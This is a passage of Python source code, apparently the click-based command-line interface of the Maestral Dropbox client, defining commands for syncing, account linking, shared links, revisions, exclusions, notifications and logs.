# A custom parameter:
# * needs a name
# * needs to pass through None unchanged
# * needs to convert from a string
# * needs to convert its result type through unchanged (eg: needs to be idempotent)
# * needs to be able to deal with param and context being None. This can be the case
# when the object is used with prompt inputs.
class DropboxPath(click.ParamType):
"""A command line parameter representing a Dropbox path
:param file_okay: Controls if a file is a possible value.
:param dir_okay: Controls if a directory is a possible value.
"""
name = "Dropbox path"
envvar_list_splitter = osp.pathsep
def __init__(self, file_okay: bool = True, dir_okay: bool = True) -> None:
self.file_okay = file_okay
self.dir_okay = dir_okay
def convert(
self,
value: Optional[str],
param: Optional[click.Parameter],
ctx: Optional[click.Context],
) -> Optional[str]:
if value is None:
return value
if not value.startswith("/"):
value = "/" + value
return value
def shell_complete(
self,
ctx: Optional[click.Context],
param: Optional[click.Parameter],
incomplete: str,
) -> List["CompletionItem"]:
from click.shell_completion import CompletionItem
from .utils import removeprefix
from .config import MaestralConfig
matches: List[str] = []
completions: List[CompletionItem] = []
# check if we have been given an absolute path
absolute = incomplete.startswith("/")
incomplete = incomplete.lstrip("/")
# get the Maestral config for which to complete paths
config_name = ctx.params.get("config_name", "maestral") if ctx else "maestral"
# get all matching paths in our local Dropbox folder
# TODO: query from server if not too slow
config = MaestralConfig(config_name)
dropbox_dir = config.get("sync", "path")
local_incomplete = osp.join(dropbox_dir, incomplete)
local_dirname = osp.dirname(local_incomplete)
try:
with os.scandir(local_dirname) as it:
for entry in it:
if entry.path.startswith(local_incomplete):
if self.file_okay and entry.is_file():
dbx_path = removeprefix(entry.path, dropbox_dir)
matches.append(dbx_path)
if self.dir_okay and entry.is_dir():
dbx_path = removeprefix(entry.path, dropbox_dir)
matches.append(dbx_path)
except OSError:
pass
# get all matching excluded items
for dbx_path in config.get("sync", "excluded_items"):
if dbx_path.startswith("/" + incomplete):
matches.append(dbx_path)
for match in matches:
if not absolute:
match = match.lstrip("/")
completions.append(CompletionItem(match))
return completions
class ConfigKey(click.ParamType):
"""A command line parameter representing a config key"""
name = "key"
def shell_complete(
self,
ctx: Optional[click.Context],
param: Optional[click.Parameter],
incomplete: str,
) -> List["CompletionItem"]:
from click.shell_completion import CompletionItem
from .config.main import KEY_SECTION_MAP as KEYS
return [CompletionItem(key) for key in KEYS if key.startswith(incomplete)]
class ConfigName(click.ParamType):
"""A command line parameter representing a Dropbox path
:param existing: If ``True`` require an existing config, otherwise create a new
config on demand.
"""
name = "config"
def __init__(self, existing: bool = True) -> None:
self.existing = existing
def convert(
self,
value: Optional[str],
param: Optional[click.Parameter],
ctx: Optional[click.Context],
) -> Optional[str]:
if value is None:
return value
from .config import validate_config_name, list_configs
if not self.existing:
# accept all valid config names
try:
return validate_config_name(value)
except ValueError:
raise cli.CliException(
"Configuration name may not contain any whitespace"
)
else:
# accept only existing config names
if value in list_configs():
return value
else:
raise cli.CliException(
f"Configuration '{value}' does not exist. "
f"Use 'maestral config-files' to list all configurations."
)
def shell_complete(
self,
ctx: Optional[click.Context],
param: Optional[click.Parameter],
incomplete: str,
) -> List["CompletionItem"]:
from click.shell_completion import CompletionItem
from .config import list_configs
matches = [conf for conf in list_configs() if conf.startswith(incomplete)]
return [CompletionItem(m) for m in matches]
# ======================================================================================
# Command groups
# ======================================================================================
class OrderedGroup(click.Group):
"""Click command group with customizable order of help output."""
def command(self, *args, **kwargs) -> Callable:
"""Behaves the same as :meth:`click.Group.command()` except captures a section
name for listing command names in help.
"""
section = kwargs.pop("section", "Commands")
from click.decorators import command
def decorator(f):
cmd = command(*args, **kwargs)(f)
cmd.section = section
self.add_command(cmd)
return cmd
return decorator
def group(self, *args, **kwargs) -> Callable:
"""Behaves the same as :meth:`click.Group.group()` except captures a section
name for listing command names in help.
"""
section = kwargs.pop("section", "Commands")
from click.decorators import group
def decorator(f):
cmd = group(*args, **kwargs)(f)
cmd.section = section
self.add_command(cmd)
return cmd
return decorator
def format_commands(
self, ctx: click.Context, formatter: click.HelpFormatter
) -> None:
"""Extra format methods for multi methods that adds all the commands
after the options.
"""
commands = []
for name in self.commands:
cmd = self.get_command(ctx, name)
# What is this, the tool lied about a command. Ignore it
if cmd is None:
continue
if cmd.hidden:
continue
commands.append((name, cmd))
# allow for 3 times the default spacing
if len(commands) > 0:
max_len = max(len(name) for name, cmd in commands)
limit = formatter.width - 6 - max_len # type: ignore
sections: Dict[str, List[Tuple[str, click.Command]]] = {}
# group commands into sections
for name, cmd in commands:
try:
sections[cmd.section].append((name, cmd)) # type: ignore
except KeyError:
sections[cmd.section] = [(name, cmd)] # type: ignore
# format sections individually
for section, cmds in sections.items():
rows = []
for name, cmd in cmds:
name = name.ljust(max_len)
help = cmd.get_short_help_str(limit)
rows.append((name, help))
if rows:
with formatter.section(section):
formatter.write_dl(rows)
@click.group(cls=OrderedGroup, help="Dropbox client for Linux and macOS.")
@click.version_option(version=__version__, message=__version__)
def main():
pass
# ======================================================================================
# Core commands
# ======================================================================================
config_option = click.option(
"-c",
"--config-name",
default="maestral",
type=ConfigName(existing=False),
is_eager=True,
expose_value=True,
help="Run command with the given configuration.",
)
existing_config_option = click.option(
"-c",
"--config-name",
default="maestral",
type=ConfigName(),
is_eager=True,
expose_value=True,
help="Run command with the given configuration.",
)
@main.command(section="Core Commands", help="Start the sync daemon.")
@click.option(
"--foreground",
"-f",
is_flag=True,
default=False,
help="Start Maestral in the foreground.",
)
@click.option(
"--verbose",
"-v",
is_flag=True,
default=False,
help="Print log messages to stderr.",
)
@config_option
@convert_api_errors
def start(foreground: bool, verbose: bool, config_name: str) -> None:
import threading
from .daemon import (
MaestralProxy,
start_maestral_daemon,
start_maestral_daemon_process,
wait_for_startup,
is_running,
Start,
CommunicationError,
)
check_for_updates()
if is_running(config_name):
click.echo("Daemon is already running.")
return
@convert_api_errors
def startup_dialog():
try:
wait_for_startup(config_name)
except CommunicationError:
return
m = MaestralProxy(config_name)
if m.pending_link:
link_dialog(m)
if m.pending_dropbox_folder:
path = select_dbx_path_dialog(config_name, allow_merge=True)
while True:
try:
m.create_dropbox_directory(path)
break
except OSError:
cli.warn(
"Could not create folder. Please make sure that you have "
"permissions to write to the selected location or choose a "
"different location."
)
            include_all = cli.confirm("Would you like to sync all folders?")
if not include_all:
# get all top-level Dropbox folders
cli.info("Loading...")
entries = m.list_folder("/", recursive=False)
names = [
cast(str, e["name"])
for e in entries
if e["type"] == "FolderMetadata"
]
choices = cli.select_multiple(
"Choose which folders to include", options=names
)
excluded_paths = [
f"/{name}"
for index, name in enumerate(names)
if index not in choices
]
m.excluded_items = excluded_paths
cli.ok("Setup completed. Starting sync.")
m.start_sync()
if foreground:
setup_thread = threading.Thread(target=startup_dialog, daemon=True)
setup_thread.start()
start_maestral_daemon(config_name, log_to_stderr=verbose)
else:
cli.echo("Starting Maestral...", nl=False)
res = start_maestral_daemon_process(config_name)
if res == Start.Ok:
cli.echo("\rStarting Maestral... " + OK)
elif res == Start.AlreadyRunning:
cli.echo("\rStarting Maestral... " + "Already running.")
else:
cli.echo("\rStarting Maestral... " + FAILED)
cli.echo("Please check logs for more information.")
startup_dialog()
@main.command(section="Core Commands", help="Stop the sync daemon.")
@existing_config_option
def stop(config_name: str) -> None:
stop_daemon_with_cli_feedback(config_name)
@main.command(section="Core Commands", help="Run the GUI if installed.")
@config_option
def gui(config_name: str) -> None:
from packaging.version import Version
from packaging.requirements import Requirement
try:
from importlib.metadata import entry_points, requires, version # type: ignore
except ImportError:
from importlib_metadata import entry_points, requires, version # type: ignore
# find all "maestral_gui" entry points registered by other packages
gui_entry_points = entry_points().get("maestral_gui")
if not gui_entry_points or len(gui_entry_points) == 0:
raise cli.CliException(
"No maestral GUI installed. Please run 'pip3 install maestral[gui]'."
)
# check if 1st party defaults "maestral_cocoa" or "maestral_qt" are installed
default_gui = "maestral_cocoa" if sys.platform == "darwin" else "maestral_qt"
default_entry_point = next(
(e for e in gui_entry_points if e.name == default_gui), None
)
if default_entry_point:
# check gui requirements
requirements = [Requirement(r) for r in requires("maestral")] # type: ignore
for r in requirements:
if r.marker and r.marker.evaluate({"extra": "gui"}):
version_str = version(r.name)
if not r.specifier.contains(Version(version_str), prereleases=True):
raise cli.CliException(
f"{r.name}{r.specifier} required but you have {version_str}"
)
# load entry point
run = default_entry_point.load()
else:
# load any 3rd party GUI
fallback_entry_point = next(iter(gui_entry_points))
run = fallback_entry_point.load()
run(config_name)
@main.command(section="Core Commands", help="Pause syncing.")
@existing_config_option
def pause(config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
try:
with MaestralProxy(config_name) as m:
m.stop_sync()
cli.ok("Syncing paused.")
except CommunicationError:
cli.echo("Maestral daemon is not running.")
@main.command(section="Core Commands", help="Resume syncing.")
@existing_config_option
def resume(config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
try:
with MaestralProxy(config_name) as m:
if not check_for_fatal_errors(m):
m.start_sync()
cli.ok("Syncing resumed.")
except CommunicationError:
cli.echo("Maestral daemon is not running.")
@main.group(section="Core Commands", help="Link, unlink and view the Dropbox account.")
def auth():
pass
@auth.command(name="link", help="Link a new Dropbox account.")
@click.option(
"--relink",
"-r",
is_flag=True,
default=False,
help="Relink to the existing account. Keeps the sync state.",
)
@config_option
@convert_api_errors
def auth_link(relink: bool, config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
if m.pending_link or relink:
link_dialog(m)
else:
cli.echo(
"Maestral is already linked. Use '-r' to relink to the same "
"account or specify a new config name with '-c'."
)
@auth.command(
name="unlink",
help="""
Unlink your Dropbox account.
If Maestral is running, it will be stopped before unlinking.
""",
)
@click.option(
"--yes", "-Y", is_flag=True, default=False, help="Skip confirmation prompt."
)
@existing_config_option
@convert_api_errors
def auth_unlink(yes: bool, config_name: str) -> None:
if not yes:
yes = cli.confirm("Are you sure you want unlink your account?", default=False)
if yes:
from .main import Maestral
stop_daemon_with_cli_feedback(config_name)
m = Maestral(config_name)
m.unlink()
cli.ok("Unlinked Maestral.")
@auth.command(name="status", help="View authentication status.")
@existing_config_option
def auth_status(config_name: str) -> None:
from .config import MaestralConfig, MaestralState
conf = MaestralConfig(config_name)
state = MaestralState(config_name)
dbid = conf.get("auth", "account_id")
email = state.get("account", "email")
account_type = state.get("account", "type").capitalize()
cli.echo("")
cli.echo(f"Email: {email}")
cli.echo(f"Account type: {account_type}")
cli.echo(f"Dropbox ID: {dbid}")
cli.echo("")
@main.group(section="Core Commands", help="Create and manage shared links.")
def sharelink():
pass
@sharelink.command(name="create", help="Create a shared link for a file or folder.")
@click.argument("dropbox_path", type=DropboxPath())
@click.option(
"-p",
"--password",
help="Optional password for the link.",
)
@click.option(
"-e",
"--expiry",
metavar="DATE",
type=click.DateTime(formats=["%Y-%m-%d", "%Y-%m-%dT%H:%M", "%Y-%m-%d %H:%M"]),
help="Expiry time for the link (e.g. '2025-07-24 20:50').",
)
@existing_config_option
@convert_api_errors
def sharelink_create(
dropbox_path: str,
password: str,
expiry: Optional["datetime"],
config_name: str,
) -> None:
from .daemon import MaestralProxy
expiry_dt: Optional[float]
if expiry:
expiry_dt = expiry.timestamp()
else:
expiry_dt = None
if password:
visibility = "password"
else:
visibility = "public"
with MaestralProxy(config_name, fallback=True) as m:
link_info = m.create_shared_link(dropbox_path, visibility, password, expiry_dt)
cli.echo(link_info["url"])
@sharelink.command(name="revoke", help="Revoke a shared link.")
@click.argument("url")
@existing_config_option
@convert_api_errors
def sharelink_revoke(url: str, config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
m.revoke_shared_link(url)
cli.ok("Revoked shared link.")
@sharelink.command(
name="list", help="List shared links for a path or all shared links."
)
@click.argument("dropbox_path", required=False, type=DropboxPath())
@existing_config_option
@convert_api_errors
def sharelink_list(dropbox_path: Optional[str], config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
links = m.list_shared_links(dropbox_path)
link_table = cli.Table(["URL", "Item", "Access", "Expires"])
for link in links:
url = cast(str, link["url"])
file_name = cast(str, link["name"])
visibility = cast(str, link["link_permissions"]["resolved_visibility"][".tag"])
dt_field: cli.Field
if "expires" in link:
expires = cast(str, link["expires"])
dt_field = cli.DateField(_datetime_from_iso_str(expires))
else:
dt_field = cli.TextField("-")
link_table.append([url, file_name, visibility, dt_field])
cli.echo("")
link_table.echo()
cli.echo("")
# ======================================================================================
# Information commands
# ======================================================================================
@main.command(section="Information", help="Show the status of the daemon.")
@existing_config_option
@convert_api_errors
def status(config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
check_for_updates()
try:
with MaestralProxy(config_name) as m:
email = m.get_state("account", "email")
account_type = m.get_state("account", "type").capitalize()
usage = m.get_state("account", "usage")
status_info = m.status
account_str = f"{email} ({account_type})" if email else "--"
usage_str = usage or "--"
n_errors = len(m.sync_errors)
color = "red" if n_errors > 0 else "green"
n_errors_str = click.style(str(n_errors), fg=color)
cli.echo("")
cli.echo(f"Account: {account_str}")
cli.echo(f"Usage: {usage_str}")
cli.echo(f"Status: {status_info}")
cli.echo(f"Sync errors: {n_errors_str}")
cli.echo("")
check_for_fatal_errors(m)
sync_errors = m.sync_errors
if len(sync_errors) > 0:
path_column = cli.Column(title="Path")
message_column = cli.Column(title="Error", wraps=True)
for error in sync_errors:
path_column.append(error["dbx_path"])
message_column.append("{title}. {message}".format(**error))
table = cli.Table([path_column, message_column])
table.echo()
cli.echo("")
except CommunicationError:
cli.echo("Maestral daemon is not running.")
@main.command(
section="Information",
help="""
Show the sync status of a local file or folder.
Returned value will be 'uploading', 'downloading', 'up to date', 'error', or 'unwatched'
(for files outside of the Dropbox directory). This will always be 'unwatched' if syncing
    is paused. This command can be used, for instance, to query sync information for a
    file manager plugin.
""",
)
@click.argument("local_path", type=click.Path(exists=True, resolve_path=True))
@existing_config_option
def filestatus(local_path: str, config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
try:
with MaestralProxy(config_name) as m:
stat = m.get_file_status(local_path)
cli.echo(stat)
except CommunicationError:
cli.echo("unwatched")
@main.command(section="Information", help="Live view of all items being synced.")
@existing_config_option
@convert_api_errors
def activity(config_name: str) -> None:
import curses
from .utils import natural_size
from .daemon import MaestralProxy, CommunicationError
try:
with MaestralProxy(config_name) as m:
if check_for_fatal_errors(m):
return
def curses_loop(screen) -> None: # no type hints for screen provided yet
curses.use_default_colors() # don't change terminal background
screen.nodelay(1) # sets `screen.getch()` to non-blocking
while True:
height, width = screen.getmaxyx()
# create header
lines = [
f"Status: {m.status}, Sync errors: {len(m.sync_errors)}",
"",
]
# create table
filenames = []
states = []
col_len = 4
for event in m.get_activity(limit=height - 3):
dbx_path = cast(str, event["dbx_path"])
direction = cast(str, event["direction"])
state = cast(str, event["status"])
size = cast(int, event["size"])
completed = cast(int, event["completed"])
filename = os.path.basename(dbx_path)
filenames.append(filename)
arrow = "↓" if direction == "down" else "↑"
if completed > 0:
done_str = natural_size(completed, sep=False)
todo_str = natural_size(size, sep=False)
states.append(f"{done_str}/{todo_str} {arrow}")
else:
if state == "syncing" and direction == "up":
states.append("uploading")
elif state == "syncing" and direction == "down":
states.append("downloading")
else:
states.append(state)
col_len = max(len(filename), col_len)
for name, state in zip(filenames, states): # create rows
lines.append(name.ljust(col_len + 2) + state)
# print to console screen
screen.clear()
try:
screen.addstr("\n".join(lines))
except curses.error:
pass
screen.refresh()
# abort when user presses 'q', refresh otherwise
key = screen.getch()
if key == ord("q"):
break
elif key < 0:
time.sleep(1)
# enter curses event loop
curses.wrapper(curses_loop)
except CommunicationError:
cli.echo("Maestral daemon is not running.")
@main.command(section="Information", help="Show recently changed or added files.")
@existing_config_option
@convert_api_errors
def history(config_name: str) -> None:
from datetime import datetime
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
events = m.get_history()
table = cli.Table(
[
cli.Column("Path", elide=cli.Elide.Leading),
cli.Column("Change"),
cli.Column("Time"),
]
)
for event in events:
dbx_path = cast(str, event["dbx_path"])
change_type = cast(str, event["change_type"])
change_time_or_sync_time = cast(float, event["change_time_or_sync_time"])
dt = datetime.fromtimestamp(change_time_or_sync_time)
table.append([dbx_path, change_type, dt])
cli.echo("")
table.echo()
cli.echo("")
@main.command(section="Information", help="List contents of a Dropbox directory.")
@click.argument("dropbox_path", type=DropboxPath(), default="")
@click.option(
"-l",
"--long",
is_flag=True,
default=False,
help="Show output in long format with metadata.",
)
@click.option(
"-d",
"--include-deleted",
is_flag=True,
default=False,
help="Include deleted items in listing.",
)
@existing_config_option
@convert_api_errors
def ls(long: bool, dropbox_path: str, include_deleted: bool, config_name: str) -> None:
from .utils import natural_size
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
cli.echo("Loading...\r", nl=False)
entries_iter = m.list_folder_iterator(
dropbox_path,
recursive=False,
include_deleted=include_deleted,
)
if long:
to_short_type = {
"FileMetadata": "file",
"FolderMetadata": "folder",
"DeletedMetadata": "deleted",
}
table = cli.Table(
columns=[
cli.Column("Name"),
cli.Column("Type"),
cli.Column("Size", align=cli.Align.Right),
cli.Column("Shared"),
cli.Column("Syncing"),
cli.Column("Last Modified"),
]
)
for entries in entries_iter:
for entry in entries:
item_type = to_short_type[cast(str, entry["type"])]
name = cast(str, entry["name"])
path_lower = cast(str, entry["path_lower"])
text = "shared" if "sharing_info" in entry else "private"
color = "bright_black" if text == "private" else None
shared_field = cli.TextField(text, fg=color)
excluded_status = m.excluded_status(path_lower)
color = "green" if excluded_status == "included" else None
text = "✓" if excluded_status == "included" else excluded_status
excluded_field = cli.TextField(text, fg=color)
if "size" in entry:
size = natural_size(cast(float, entry["size"]))
else:
size = "-"
dt_field: cli.Field
if "client_modified" in entry:
cm = cast(str, entry["client_modified"])
dt_field = cli.DateField(_datetime_from_iso_str(cm))
else:
dt_field = cli.TextField("-")
table.append(
[name, item_type, size, shared_field, excluded_field, dt_field]
)
cli.echo(" " * 15)
table.echo()
cli.echo(" " * 15)
else:
grid = cli.Grid()
for entries in entries_iter:
for entry in entries:
name = cast(str, entry["name"])
color = "blue" if entry["type"] == "DeletedMetadata" else None
grid.append(cli.TextField(name, fg=color))
grid.echo()
@main.command(section="Information", help="List all configured Dropbox accounts.")
@click.option(
"--clean",
is_flag=True,
default=False,
help="Remove config files without a linked account.",
)
def config_files(clean: bool) -> None:
from .daemon import is_running
from .config import (
MaestralConfig,
MaestralState,
list_configs,
remove_configuration,
)
if clean:
# Clean up stale config files.
for name in list_configs():
conf = MaestralConfig(name)
dbid = conf.get("auth", "account_id")
if dbid == "" and not is_running(name):
remove_configuration(name)
cli.echo(f"Removed: {conf.config_path}")
else:
# Display config files.
names = list_configs()
emails = []
paths = []
for name in names:
conf = MaestralConfig(name)
state = MaestralState(name)
emails.append(state.get("account", "email"))
paths.append(conf.config_path)
table = cli.Table(
[
cli.Column("Config name", names),
cli.Column("Account", emails),
cli.Column("Path", paths, elide=cli.Elide.Leading),
]
)
cli.echo("")
table.echo()
cli.echo("")
# ======================================================================================
# Settings
# ======================================================================================
@main.command(
section="Settings",
help="""
Automatically start the sync daemon on login.
A systemd or launchd service will be created to start a sync daemon for the given
configuration on user login.
""",
)
@click.option("--yes", "-Y", is_flag=True, default=False)
@click.option("--no", "-N", is_flag=True, default=False)
@existing_config_option
def autostart(yes: bool, no: bool, config_name: str) -> None:
from .autostart import AutoStart
auto_start = AutoStart(config_name)
if not auto_start.implementation:
cli.echo(
"Autostart is currently not supported for your platform.\n"
"Autostart requires systemd on Linux or launchd on macOS."
)
return
if yes or no:
if yes:
auto_start.enable()
cli.ok("Enabled start on login.")
else:
auto_start.disable()
cli.ok("Disabled start on login.")
else:
if auto_start.enabled:
cli.echo("Autostart is enabled. Use -N to disable.")
else:
cli.echo("Autostart is disabled. Use -Y to enable.")
@main.group(section="Settings", help="View and manage excluded folders.")
def excluded():
pass
@excluded.command(name="list", help="List all excluded files and folders.")
@existing_config_option
def excluded_list(config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
excluded_items = m.excluded_items
excluded_items.sort()
if len(excluded_items) == 0:
cli.echo("No excluded files or folders.")
else:
for item in excluded_items:
cli.echo(item)
@excluded.command(
name="add",
help="Add a file or folder to the excluded list and re-sync.",
)
@click.argument("dropbox_path", type=DropboxPath())
@existing_config_option
@convert_api_errors
def excluded_add(dropbox_path: str, config_name: str) -> None:
from .daemon import MaestralProxy
if dropbox_path == "/":
raise cli.CliException("Cannot exclude the root directory.")
with MaestralProxy(config_name, fallback=True) as m:
m.exclude_item(dropbox_path)
cli.ok(f"Excluded '{dropbox_path}'.")
@excluded.command(
name="remove",
help="""
Remove a file or folder from the excluded list and re-sync.
    It is safe to call this method with items which have already been included; they will
not be downloaded again. If the given path lies inside an excluded folder, the parent
folder will be included as well (but no other items inside it).
""",
)
@click.argument("dropbox_path", type=DropboxPath())
@existing_config_option
@convert_api_errors
def excluded_remove(dropbox_path: str, config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
if dropbox_path == "/":
return cli.echo("The root directory is always included")
try:
with MaestralProxy(config_name) as m:
m.include_item(dropbox_path)
cli.ok(f"Included '{dropbox_path}'. Now downloading...")
except CommunicationError:
raise cli.CliException("Daemon must be running to download folders.")
@main.group(section="Settings", help="Manage desktop notifications.")
def notify():
pass
@notify.command(
name="level",
help="Get or set the level for desktop notifications.",
)
@click.argument(
"level_name",
required=False,
type=click.Choice(["ERROR", "SYNCISSUE", "FILECHANGE"], case_sensitive=False),
)
@existing_config_option
def notify_level(level_name: str, config_name: str) -> None:
from . import notify as _notify
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
if level_name:
m.notification_level = _notify.level_name_to_number(level_name)
cli.ok(f"Notification level set to {level_name}.")
else:
level_name = _notify.level_number_to_name(m.notification_level)
cli.echo(f"Notification level: {level_name}.")
@notify.command(
name="snooze",
help="Snooze desktop notifications of file changes.",
)
@click.argument("minutes", type=click.IntRange(min=0))
@existing_config_option
def notify_snooze(minutes: int, config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
try:
with MaestralProxy(config_name) as m:
m.notification_snooze = minutes
except CommunicationError:
cli.echo("Maestral daemon is not running.")
else:
if minutes > 0:
cli.ok(
f"Notifications snoozed for {minutes} min. Set snooze to 0 to reset."
)
else:
cli.ok("Notifications enabled.")
# ======================================================================================
# Maintenance
# ======================================================================================
@main.command(section="Maintenance", help="Move the local Dropbox folder.")
@click.argument("new_path", required=False, type=click.Path(writable=True))
@existing_config_option
def move_dir(new_path: str, config_name: str) -> None:
from .daemon import MaestralProxy
new_path = new_path or select_dbx_path_dialog(config_name)
with MaestralProxy(config_name, fallback=True) as m:
m.move_dropbox_directory(new_path)
cli.ok(f"Dropbox folder moved to {new_path}.")
@main.command(
section="Maintenance",
help="""
Rebuild the sync index.
Rebuilding may take several minutes, depending on the size of your Dropbox.
""",
)
@click.option(
"--yes", "-Y", is_flag=True, default=False, help="Skip confirmation prompt."
)
@existing_config_option
@convert_api_errors
def rebuild_index(yes: bool, config_name: str) -> None:
import textwrap
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
width = cli.get_term_width()
msg = textwrap.fill(
"Rebuilding the index may take several minutes, depending on the size of "
"your Dropbox. Any changes to local files will be synced once rebuilding "
"has completed. If you stop the daemon during the process, rebuilding will "
"start again on the next launch.\nIf the daemon is not currently running, "
"a rebuild will be scheduled for the next startup.",
width=width,
)
cli.echo(msg + "\n")
if yes or cli.confirm("Do you want to continue?", default=False):
m.rebuild_index()
if m._is_fallback:
cli.ok("Daemon is not running. Rebuilding scheduled for next startup.")
else:
cli.ok("Rebuilding now. Run 'maestral status' to view progress.")
@main.command(section="Maintenance", help="List old file revisions.")
@click.argument("dropbox_path", type=DropboxPath())
@click.option(
"-l",
"--limit",
help="Maximum number of revs to list.",
show_default=True,
type=click.IntRange(min=1, max=100),
default=10,
)
@existing_config_option
@convert_api_errors
def revs(dropbox_path: str, limit: int, config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
entries = m.list_revisions(dropbox_path, limit=limit)
table = cli.Table(["Revision", "Modified Time"])
for entry in entries:
rev = cast(str, entry["rev"])
dt = _datetime_from_iso_str(cast(str, entry["client_modified"]))
table.append([cli.TextField(rev), cli.DateField(dt)])
cli.echo("")
table.echo()
cli.echo("")
@main.command(
section="Maintenance",
help="""
Compare two revisions of a file.
If no revs are passed to the command, you can select the revisions interactively. If
only one rev is passed, it is compared to the local version of the file. The diff is
shown via a pager if longer than 30 lines.
Warning: The specified revisions will be downloaded to temp files and loaded into memory
to generate the diff. Depending on the file size, this may use significant disk space
and memory.
""",
)
@click.argument("dropbox_path", type=DropboxPath())
@click.option(
"-v",
"--rev",
help="Revisions to compare (multiple allowed).",
multiple=True,
default=[],
)
@click.option("--no-color", help="Don't use colors for the diff.", is_flag=True)
@click.option("--no-pager", help="Don't use a pager for output.", is_flag=True)
@click.option(
"-l",
"--limit",
help="Maximum number of revs to list.",
show_default=True,
type=click.IntRange(min=1, max=100),
default=10,
)
@convert_api_errors
@existing_config_option
def diff(
dropbox_path: str,
rev: List[str],
no_color: bool,
no_pager: bool,
limit: int,
config_name: str,
) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
# Ask for user input if revs are not provided as CLI arguments.
if len(rev) == 0:
entries = m.list_revisions(dropbox_path, limit=limit)
for entry in entries:
cm = cast(str, entry["client_modified"])
field = cli.DateField(_datetime_from_iso_str(cm))
entry["desc"] = field.format(40)[0]
dbx_path = cast(str, entries[0]["path_display"])
local_path = m.to_local_path(dbx_path)
if osp.isfile(local_path):
# prepend local version as an option
entries.insert(0, {"desc": "local version", "rev": None})
index_base = cli.select(
message="New revision:",
options=[e["desc"] for e in entries],
hint="(↓ to see more)" if len(entries) > 6 else "",
)
if index_base == len(entries) - 1:
cli.warn(
"Oldest revision selected, unable to find anything to compare."
)
return
comparable_versions = entries[index_base + 1 :]
index_new = cli.select(
message="Old revision:",
options=[e["desc"] for e in comparable_versions],
hint="(↓ to see more)" if len(comparable_versions) > 6 else "",
)
old_rev = entries[index_new + index_base + 1]["rev"]
new_rev = entries[index_base]["rev"]
elif len(rev) == 1:
old_rev = rev[0]
new_rev = None
elif len(rev) == 2:
old_rev = rev[0]
new_rev = rev[1]
elif len(rev) > 2:
cli.warn("You can only compare two revisions at a time.")
return
# Download up to two revisions to a local temporary folder
# and compare them with a 'diff'. Only text files are supported.
        # If a file type that doesn't match 'text/*' is encountered,
        # an error message gets printed instead.
click.echo("Loading ...\r", nl=False)
diff_output = m.get_file_diff(old_rev, new_rev)
if len(diff_output) == 0:
click.echo("There are no changes between the two revisions.")
return
def color(ind: int, line: str) -> str:
"""
Color diff lines.
Inspiration for colors was taken from the
well known command 'git diff'.
"""
if ind < 2:
line = click.style(line, bold=True)
elif line.startswith("+"):
line = click.style(line, fg="green")
elif line.startswith("-"):
line = click.style(line, fg="red")
# Don't highlight these in the intro.
elif line.startswith("@@ "):
line = click.style(line, fg="cyan")
return line
# Color the lines.
if not no_color:
diff_output = [color(i, l) for i, l in enumerate(diff_output)]
# Enter pager if diff is too long
if len(diff_output) > 30 and not no_pager:
click.echo_via_pager("".join(diff_output))
else:
click.echo("".join(diff_output))
@main.command(
section="Maintenance",
help="""
Restore a previous version of a file.
If no revision number is given, old revisions will be listed.
""",
)
@click.argument("dropbox_path", type=DropboxPath())
@click.option("-v", "--rev", help="Revision to restore.", default="")
@click.option(
"-l",
"--limit",
help="Maximum number of revs to list.",
show_default=True,
type=click.IntRange(min=1, max=100),
default=10,
)
@existing_config_option
@convert_api_errors
def restore(dropbox_path: str, rev: str, limit: int, config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
if not rev:
cli.echo("Loading...\r", nl=False)
entries = m.list_revisions(dropbox_path, limit=limit)
dates = []
for entry in entries:
cm = cast(str, entry["client_modified"])
field = cli.DateField(_datetime_from_iso_str(cm))
dates.append(field.format(40)[0])
index = cli.select(
message="Select a version to restore:",
options=dates,
hint="(↓ to see more)" if len(entries) > 6 else "",
)
rev = cast(str, entries[index]["rev"])
m.restore(dropbox_path, rev)
cli.ok(f'Restored {rev} to "{dropbox_path}"')
@main.group(section="Maintenance", help="View and manage the log.")
def log():
pass
@log.command(name="show", help="Print logs to the console.")
@click.option(
"--external", "-e", is_flag=True, default=False, help="Open in external program."
)
@existing_config_option
def log_show(external: bool, config_name: str) -> None:
from .utils.appdirs import get_log_path
log_file = get_log_path("maestral", config_name + ".log")
if external:
res = click.launch(log_file)
else:
try:
with open(log_file) as f:
text = f.read()
click.echo_via_pager(text)
except OSError:
res = 1
else:
res = 0
if res > 0:
raise cli.CliException(f"Could not open log file at '{log_file}'")
@log.command(name="clear", help="Clear the log files.")
@existing_config_option
def log_clear(config_name: str) -> None:
from .utils.appdirs import get_log_path
log_dir = get_log_path("maestral")
log_name = config_name + ".log"
log_files = []
for file_name in os.listdir(log_dir):
if file_name.startswith(log_name):
log_files.append(os.path.join(log_dir, file_name))
try:
for file in log_files:
open(file, "w").close()
cli.ok("Cleared log files.")
except FileNotFoundError:
cli.ok("Cleared log files.")
except OSError:
raise cli.CliException(
f"Could not clear log at '{log_dir}'. " f"Please try to delete it manually"
)
@log.command(name="level", help="Get or set the log level.")
@click.argument(
"level_name",
required=False,
type=click.Choice(["DEBUG", "INFO", "WARNING", "ERROR"], case_sensitive=False),
)
@existing_config_option
def log_level(level_name: str, config_name: str) -> None:
import logging
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
if level_name:
m.log_level = cast(int, getattr(logging, level_name))
cli.ok(f"Log level set to {level_name}.")
else:
